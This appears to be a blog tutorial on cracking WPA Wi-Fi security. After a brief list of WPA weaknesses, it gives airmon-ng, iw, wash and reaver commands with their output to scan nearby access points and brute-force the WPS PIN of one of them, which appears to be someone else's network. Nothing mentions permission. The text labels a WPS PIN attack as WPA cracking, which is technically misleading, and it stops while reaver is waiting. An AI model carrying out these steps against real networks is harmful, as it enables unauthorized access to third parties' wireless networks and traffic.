We looked in our previous how to into steps required to brake WEP. WPA is successor to WEP protocol. WPA was intended to be secure replacement for the flawed and insecure WEP protocol. WPA introduced TKIP system which purpose was to improve data encryption. TKIP enhances security by changing the key after every frame. This makes WPA much more difficult to crack.

WPA vulnerabilities

  • Packet spoofing
  • Weak key usage
  • Authentication issues with MS-CHAP v2(Microsoft Challenge Handshake Authentication Protocol v2)

Cracking WPA

Start airmon-ng

# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  500 NetworkManager
  673 wpa_supplicant
  690 dhclient

PHY	Interface	Driver		Chipset

phy0	wlan0		iwlwifi		Intel Corporation WiFi Link 5100

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

Mke sure the wireless is in monitor mode

# iw dev
phy#0
	Interface wlan0mon
		ifindex 4
		wdev 0x2
		addr 00:21:5d:d2:1f:ee
		type monitor
		channel 10 (2457 MHz), width: 20 MHz (no HT), center1: 2457 MHz

Now we will locate access points with command called wash

# wash -i wlan0mon

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
mod by t6_x  & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
02:BE:F5:00:22:EE       4            -73        1.0               No                A-TEAM
40:65:A3:61:41:6E       6            -87        1.0               No                BELL416

Now lets start command to retrive PIN

# reaver -i wlan0mon -b 40:65:A3:61:41:6E 

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
mod by t6_x  & DataHead & Soxrok2212

[+] Waiting for beacon from 40:65:A3:61:41:6E

Please note depending on how much traffic access point generates it may take quite some time to complete